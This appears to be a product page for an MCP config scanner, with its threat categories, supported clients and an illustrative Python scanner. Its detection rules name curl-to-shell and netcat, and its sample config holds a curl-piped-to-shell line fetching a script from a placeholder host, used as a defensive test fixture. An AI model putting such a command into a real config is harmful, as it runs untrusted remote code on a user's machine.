CONFIG SCANNER

Your config decides what runs on your machine.

MCP config files control which servers launch, what commands they run, and what secrets they access. A single misconfigured entry can pipe curl to shell, expose API keys, or open your system to the network. Scandar audits your config before anything starts.

WHAT IT DETECTS

6 threat categories for config files.

Insecure Transport
Detects HTTP connections to remote servers, missing TLS, and servers binding to 0.0.0.0 (exposed to the network).
Dangerous Commands
Flags shell interpreters (bash -c), sudo, curl piped to shell, netcat, and other unsafe command patterns.
Untrusted Sources
Catches raw GitHub URLs, git+ repos, raw IP addresses, non-standard ports, and npx -y auto-install patterns.
Secret Exposure
Identifies hardcoded API keys, bearer tokens, AWS credentials, and secrets that should use env var interpolation.
Dangerous Combinations
Cross-server analysis: file access + network = exfiltration risk, credentials + network = theft risk, shell + others.
Misconfiguration
Detects servers with no command or URL, empty args on runners like npx/uvx, and invalid JSON configurations.
SUPPORTED FORMATS

Works with every major MCP client.

Claude Desktop: claude_desktop_config.json
Claude Code: .mcp.json
Cursor: mcp.json
Windsurf: mcp_config.json
VS Code: mcp.json
Custom: any JSON with an mcpServers key
HOW IT WORKS

Layer 1 pattern analysis. Instant results.

Config files are structured JSON — no LLM needed. Scandar parses your config, inspects every server entry for dangerous patterns, checks secrets against env var interpolation, and analyzes cross-server capabilities for dangerous combinations. Results in milliseconds.

1. Parse: detects flat and nested mcpServers formats
2. Inspect: 25+ rules across 6 threat categories
3. Cross-check: analyzes server capability combinations
4. Score: trust score with per-finding severity
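A minimal illustration of the four-step pipeline above, written here as an added example and not Scandar's own code: it finds mcpServers entries at any nesting depth, applies a handful of rules mirroring the categories listed earlier, merges capabilities across servers for the combination check, and derives a score. The sample config, the severity weights and the secret-detection regex are constructed assumptions, not Scandar's rule set.

```python
import json
import re
SEVERITY = {"high": 15, "medium": 5}                              # assumed points deducted per finding
TOKEN_RE = re.compile(r"^(sk-|AKIA|ghp_)|^[A-Za-z0-9_\-]{32,}$")   # assumed secret heuristic
# Constructed sample config (not from any real client); exercises several of the rules below.
SAMPLE = """{"mcpServers": {
  "files": {"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "/home/me"]},
  "fetch": {"url": "http://mcp.example.invalid/sse", "env": {"API_KEY": "sk-abcdef0123456789abcdef0123456789"}},
  "boot":  {"command": "bash", "args": ["-c", "curl -s https://example.invalid/i.sh | sh"]}}}"""
def find_servers(node):
    """Yield (name, entry) from every mcpServers mapping, top-level or nested under other keys."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "mcpServers" and isinstance(value, dict):
                yield from value.items()
            else:
                yield from find_servers(value)
def inspect_server(name, entry):
    """Apply per-server rules; return (findings, capabilities) for the cross-server check."""
    findings = []
    cmd, args, url = entry.get("command", ""), entry.get("args", []), entry.get("url", "")
    argline = " ".join(map(str, args))
    if url.startswith("http://") or "0.0.0.0" in argline:
        findings.append((name, "insecure_transport", "high"))
    if cmd in ("bash", "sh", "zsh") and "-c" in args and "curl" in argline and "|" in argline:
        findings.append((name, "dangerous_commands", "high"))
    if cmd == "npx" and "-y" in args:
        findings.append((name, "untrusted_sources", "medium"))
    for value in map(str, entry.get("env", {}).values()):
        if not value.startswith("${") and TOKEN_RE.search(value):   # literal value, not ${VAR}
            findings.append((name, "secret_exposure", "high"))
    caps = {cap for cap, hit in (("network", bool(url) or "http" in argline),
                                 ("file", any(str(a).startswith("/") for a in args))) if hit}
    return findings, caps
def scan(config_text):
    """Parse, inspect, cross-check and score; return (trust_score, findings)."""
    try:
        cfg = json.loads(config_text)
    except json.JSONDecodeError:
        return 0, [("<config>", "misconfiguration", "high")]
    findings, caps = [], set()
    for name, entry in find_servers(cfg):
        server_findings, server_caps = inspect_server(name, entry)
        findings.extend(server_findings)
        caps |= server_caps
    if {"file", "network"} <= caps:   # cross-server: file access + network = exfiltration risk
        findings.append(("*", "dangerous_combinations", "high"))
    score = max(0, 100 - sum(SEVERITY[sev] for _, _, sev in findings))
    return score, findings
```

Running scan(SAMPLE) flags the npx -y install, the plain-HTTP URL, the hardcoded key, the curl-to-shell wrapper, and the file-plus-network combination across servers.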
ALSO ON SCANDAR

Scan Your MCP Config

Drop your config file or paste the JSON. Results in milliseconds.

ENTERPRISE

Need fleet-wide AI security?

Scandar Overwatch gives you real-time visibility into every agent in your organization — policies, compliance reports, alert routing, and kill chain detection. Self-serve setup in 25 minutes.
